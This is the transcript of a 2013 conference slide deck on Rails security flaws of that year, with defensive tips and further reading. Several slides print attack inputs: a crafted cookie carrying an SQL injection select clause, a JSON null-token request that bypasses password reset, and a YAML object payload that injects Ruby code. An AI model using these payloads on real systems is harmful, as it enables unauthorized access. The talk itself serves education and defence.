Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Rails Security Primer

Rails Security Primer

A short overview of Rails' software security troubles in January and February of 2013, and a few tips on how to defend yourself against attackers. Presented at Vienna.rb on 2013-03-07

Markus Wein

March 07, 2013
Tweet

More Decks by Markus Wein

Other Decks in Programming

Transcript

  1. Exploit A piece of software that exploits a vulnerability to

    achieve unintended or unanticipated behavior
  2. { "session_id" => "41414141", "user_credentials" => "Phenoelit", "user_credentials_id" => {

    :select=> " *,\"Phenoelit\" as persistence_token from users -- " } } A cookie like
  3. …would create a query like this User.find_by_id({:select =>"*,\"Phenoelit\" as persistence_token

    from users --"}) User.find_by_id(params[:user_credendtials_id])
  4. …would create a query like this User.find_by_id({:select =>"*,\"Phenoelit\" as persistence_token

    from users --"}) SELECT *,"Phenoelit" as persistence_token from users -- FROM "users" WHERE "users"."id" IS NULL LIMIT 1 User.find_by_id(params[:user_credendtials_id])
  5. def reset_password if (@user = User.find_by_token(params[:token])) @user.reset_password! render :json =>

    'Success' else render :json => 'Failure' end end # POST to http://localhost:3000/users/ reset_password with "{\"token\":[null]}"
  6. class Helpers def initialize @module = Module.new end def []=(key,

    value) @module.module_eval <<-END_EVAL def #{value}(*args) # ... other stuff end END_EVAL end end
  7. <fail type="yaml"> --- !ruby/hash:Helpers foo: |- mname; end; puts 'hello!';

    def oops </fail> • Ah, this is a subclass of a Ruby hash with the class of Helpers
  8. <fail type="yaml"> --- !ruby/hash:Helpers foo: |- mname; end; puts 'hello!';

    def oops </fail> • Ah, this is a subclass of a Ruby hash with the class of Helpers • Create a new instance of Helpers
  9. <fail type="yaml"> --- !ruby/hash:Helpers foo: |- mname; end; puts 'hello!';

    def oops </fail> • Ah, this is a subclass of a Ruby hash with the class of Helpers • Create a new instance of Helpers • Use []= method for each key-value-pair
  10. class Helpers def initialize @module = Module.new end def []=(key,

    value) @module.module_eval <<-END_EVAL def #{value}(*args) # ... other stuff end END_EVAL end end ['foo', "mname; end; puts 'hello!'; def oops"]
  11. User.where(:login_token=>params[:token]).first SELECT * FROM `users` WHERE `login_token` = 0 LIMIT

    1; “Potential Query Manipulation with Common Rails Practices”
  12. (i.e., as a big, "drop everything right now", deal) Treat

    each vulnerability as if your servers were physically on fire
  13. Sources I used for this talk: http://www.kalzumeus.com/2013/01/31/what-the- rails-security-issue-means-for-your-startup/ http://ronin-ruby.github.com/blog/2013/01/09/ rails-pocs.html

    http://ronin-ruby.github.com/blog/2013/01/28/ new-rails-poc.html http://blog.codeclimate.com/blog/2013/01/10/rails- remote-code-execution-vulnerability-explained/ http://tenderlovemaking.com/2013/02/06/yaml- f7u12.html http://blog.gemfury.com/post/42259456238/ rubygems-vulnerability-explained
  14. Further reading: http://guides.rubyonrails.org/security.html Ruby On Rails Security Guide http://rails-sqli.org Rails

    SQL Injection Overview http://brakemanscanner.org Brakeman: Vulnerability scanner for Rails https://groups.google.com/forum/rubyonrails- security